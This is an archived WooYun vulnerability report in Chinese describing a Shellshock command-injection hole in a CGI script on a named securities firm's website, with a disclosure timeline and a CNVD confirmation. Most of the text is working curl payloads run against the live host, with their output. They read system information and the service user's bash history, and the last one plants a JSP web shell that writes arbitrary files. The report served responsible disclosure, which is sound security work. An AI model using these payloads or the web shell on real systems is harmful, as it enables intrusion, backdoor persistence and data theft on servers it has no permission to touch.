乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-10: 细节已通知厂商并且等待厂商处理中 2015-09-11: 厂商已经确认,细节仅向厂商公开 2015-09-21: 细节向核心白帽子及相关领域专家公开 2015-10-01: 细节向普通白帽子公开 2015-10-11: 细节向实习白帽子公开 2015-10-26: 细节向公众公开
RT,任意系统命令执行,威胁直达主站
curl -H "xxx: () { ignored; }; echo Content-Type: text/plain ; echo ;/bin/cat /etc/issue" http://www.gkzq.com.cn/cgi-bin/test-cgiRed Hat Enterprise Linux Server release 5.7 (Tikanga)Kernel \r on an \m
查看了下自身的用户
curl -H "xxx: () { ignored; }; echo Content-Type: text/plain ; echo ;/usr/bin/whoami" http://www.gkzq.com.cn/cgi-bin/test-cgiweblogic
发现是weblogic,估计也不是root组了
curl -H "xxx: () { ignored; }; echo Content-Type: text/plain ; echo ;/usr/bin/id" http://www.gkzq.com.cn/cgi-bin/test-cgiuid=1000(weblogic) gid=1000(weblogic) groups=1000(weblogic)
习惯性的查看了下IP地址.发现还是内网
curl -H "xxx: () { ignored; }; echo Content-Type: text/plain ; echo ;/sbin/ifconfig" http://www.gkzq.com.cn/cgi-bin/test-cgibond0 Link encap:Ethernet HWaddr AC:16:2D:8A:01:F8 inet addr:10.200.3.4 Bcast:10.200.3.15 Mask:255.255.255.240 UP BROADCAST RUNNING MASTER MULTICAST MTU:1500 Metric:1 RX packets:3203379937 errors:0 dropped:0 overruns:0 frame:2 TX packets:4834148049 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:830582707308 (773.5 GiB) TX bytes:3638374711428 (3.3 TiB)eth0 Link encap:Ethernet HWaddr AC:16:2D:8A:01:F8 UP BROADCAST RUNNING SLAVE MULTICAST MTU:1500 Metric:1 RX packets:3203379937 errors:0 dropped:0 overruns:0 frame:2 TX packets:4834148049 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:830582707308 (773.5 GiB) TX bytes:3638374711428 (3.3 TiB) Interrupt:83 Memory:f6bf0000-f6c00000eth1 Link encap:Ethernet HWaddr AC:16:2D:8A:01:F8 UP BROADCAST SLAVE MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) Interrupt:91 Memory:f6bc0000-f6bd0000lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:3800316349 errors:0 dropped:0 overruns:0 frame:0 TX packets:3800316349 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:773668241712 (720.5 GiB) TX bytes:773668241712 (720.5 GiB)
既然用户是weblogic,还可以执行命令,查看了下/home/weblogic/.bash_history
curl -H "xxx: () { ignored; }; echo Content-Type: text/plain ; echo ;/bin/cat /home/weblogic/.bash_history" http://www.gkzq.com.cn/cgi-bin/test-cgillcd -vi jjrServer.jspcd -cd ..rzcd ../wsyyt/vi xxgs_jjr.jspcd /opt/bea/user_projects/xxxxxxxxxxx/xxxxxxxxx/newback.war/llcd /opt/bea/user_projects/xxxxxxxxxxx/xxxxxxxxx/gkzq.war/wsyyt/server/vi jjrListServer.jsp....................
得到了网站的物理路径,然后百度出真实地址,再顺手写了一个小马进去
curl -H "xxx: () { ignored; }; echo Content-Type: text/plain ; echo ;/bin/echo '<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.getRealPath(\"/\")+request.getParameter(\"f\"))).write(request.getParameter(\"t\").getBytes());%>ok'>/opt/bea/user_projects/XXXXXX/XXXXXXX/gkzq.war/wsyyt/wooyun.jsp" http://www.gkzq.com.cn/cgi-bin/test-cgi
http://www.gkzq.com.cn/gkzq/wsyyt/wooyun.jsp 随时可以到内部
不再深入~记得删除
危害等级:高
漏洞Rank:13
确认时间:2015-09-11 10:44
CNVD确认并复现所述情况,已经转由CNCERT向证券业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无